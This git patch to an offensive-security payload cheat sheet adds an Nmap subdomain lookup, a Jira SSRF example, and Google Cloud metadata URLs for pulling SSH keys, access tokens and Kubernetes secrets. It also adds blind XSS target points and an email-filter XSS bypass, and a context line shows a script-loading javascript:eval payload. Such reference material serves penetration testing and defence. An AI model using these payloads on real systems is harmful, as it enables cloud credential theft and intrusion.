From 928a45453143c2688d61ff03c2352fbb9414b82d Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 25 Nov 2018 15:44:17 +0100 Subject: [PATCH] Blind XSS endpoint + SSRF Google + Nmap subdomains --- .../Subdomains Enumeration.md | 7 +++++++ SSRF injection/README.md | 9 +++++++++ XSS injection/README.md | 14 ++++++++++++++ 3 files changed, 30 insertions(+) diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index f530b8f..72fff2d 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -12,6 +12,7 @@ * Aquatone (Ruby and Go versions) * AltDNS * MassDNS + * Nmap * Subdomain take over * tko-subs * HostileSubBruteForcer @@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt" cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt ``` +### Using Nmap + +```powershell +nmap -sn --script hostmap-crtsh host_to_scan.tld +``` + ## Subdomain take over Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. diff --git a/SSRF injection/README.md b/SSRF injection/README.md index cb36b30..dfcdb30 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -330,6 +330,8 @@ http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy ``` +E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` + ### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" @@ -356,6 +358,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` +Interesting files to pull out: + +- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` +- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token` +- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json` + ### SSRF URL for Digital Ocean Documentation available at `https://developers.digitalocean.com/documentation/metadata/` @@ -478,3 +486,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) +- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index ad8fa78..82f8620 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -325,6 +325,14 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver) - [ezXSS - ssl](https://github.com/ssl/ezXSS) +### Blind XSS endpoint + +- Contact forms +- Ticket support +- Referer Header + - Custom Site Analytics + - Administrative Panel logs + ## Polyglot XSS Polyglot XSS - 0xsobky @@ -507,6 +515,12 @@ $ echo "" | xxd 00000010: 6572 7428 3129 0c3e 0a ert(1).>. ``` +Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) + +```javascript +">"@x.y +``` + Bypass document blacklist ```javascript